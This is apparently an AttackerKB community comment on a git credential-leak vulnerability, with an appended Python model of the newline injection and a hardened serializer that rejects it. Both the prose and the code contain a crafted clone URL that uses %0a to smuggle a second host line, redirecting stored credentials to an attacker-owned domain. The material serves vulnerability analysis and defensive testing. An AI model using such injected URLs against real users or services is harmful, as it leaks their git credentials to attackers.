Green-m (7)
Technical Analysis
Exploitation is very easy
This vuln is just a CRLF injection in my opinion.
You could offer a URL like https://one.example.com?%0ahost=two.example.com/ so that the credential would be sent to two.example.com, which the attacker owns.
The value is limited
I guess there are some prerequisites for the attack:
A subdomain name that has the same main domain name as the target.
The victim stores or caches the credentials (it's not the default behavior).
May need user interaction. The exploit usually occurs when the user runs git clone <URL>.
That's why I'd say the value for the attacker is low.
Another interesting scenario
This vuln probably affected apps and services based on git, like GitLab (not including GitLab).
These services may allow users to import or remote-clone some repo, where this vuln would occur.
Original patch
https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b
Fix and workaround
See https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q
This has been my first comment in this awesome AttackerKB community; discussion and helpful advice are welcome.
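The injection described in the post, and the check that closes it, as an added example that is not part of the original post and not git's own code. It is a simplified Python model of how a clone URL becomes the key=value lines git sends to a credential helper: the host segment is taken up to the first slash and percent-decoded (an assumption about the parser, kept to the minimum needed to show the mechanism), so %0a becomes a literal newline and a second host= line appears. A helper that reads lines until the first blank line keeps the last value for a repeated key, which is why the injected host wins. The hardened serializer rejects any field containing a newline, carriage return or NUL, and refuses a request with no host; the sample URL is constructed for the example.

```python
"""Model of newline injection in the git credential helper protocol.

Added example, not code from the original post or from git. It models
in simplified form how a URL is turned into the key=value request that
git sends to a credential helper, and the defensive check that refuses
any field carrying a newline.
"""
from urllib.parse import unquote


class InvalidCredentialUrl(ValueError):
    """Raised when a URL cannot safely be turned into a helper request."""


def split_url(url: str) -> dict:
    """Simplified split of protocol://host/... into credential fields.

    Assumption (model, not git's parser): the host segment runs from the
    end of '://' to the first '/', and is percent-decoded. That decoding
    is what lets %0a become a literal newline inside the host field.
    """
    scheme, sep, rest = url.partition("://")
    if not sep or not scheme:
        raise InvalidCredentialUrl("missing protocol")
    host, _, _path = rest.partition("/")
    return {"protocol": scheme, "host": unquote(host)}


def serialize_naive(fields: dict) -> str:
    """Vulnerable serializer: writes each field verbatim as a key=value line."""
    return "".join(f"{k}={v}\n" for k, v in fields.items()) + "\n"


def serialize_checked(fields: dict) -> str:
    """Hardened serializer: refuses control characters and an empty host."""
    for key, value in fields.items():
        if any(ch in value for ch in "\r\n\0"):
            raise InvalidCredentialUrl(f"newline or NUL in field {key!r}")
    if not fields.get("host"):
        raise InvalidCredentialUrl("missing host")
    return serialize_naive(fields)


def parse_helper_request(text: str) -> dict:
    """Parse key=value lines the way a helper reads them.

    Lines are read until the first blank line; a repeated key overwrites
    the earlier value, so an injected second host= line takes effect.
    """
    fields = {}
    for line in text.split("\n"):
        if not line:
            break
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def effective_host(url: str, serializer=serialize_naive) -> str:
    """Host a helper would look credentials up for, under a given serializer."""
    return parse_helper_request(serializer(split_url(url)))["host"]


def is_safe(url: str) -> bool:
    """True if the hardened serializer accepts the URL."""
    try:
        serialize_checked(split_url(url))
        return True
    except InvalidCredentialUrl:
        return False


# Constructed sample inputs for the example.
INJECTED_URL = "https://one.example.com?%0ahost=two.example.com/"
BENIGN_URL = "https://one.example.com/org/repo.git"

if __name__ == "__main__":
    print("naive, injected  ->", effective_host(INJECTED_URL))
    print("naive, benign    ->", effective_host(BENIGN_URL))
    print("checked, injected->", is_safe(INJECTED_URL))
    print("checked, benign  ->", is_safe(BENIGN_URL))
```

Running the block shows the naive path resolving the injected URL to two.example.com while the benign clone URL stays on one.example.com, and the checked path rejecting only the injected one. The same rule is a reasonable defensive test for any service that builds credential-helper or similar line-oriented requests from user-supplied URLs.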